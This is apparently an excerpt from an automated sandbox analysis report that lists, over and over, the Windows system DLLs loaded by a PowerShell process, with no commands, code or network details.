Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
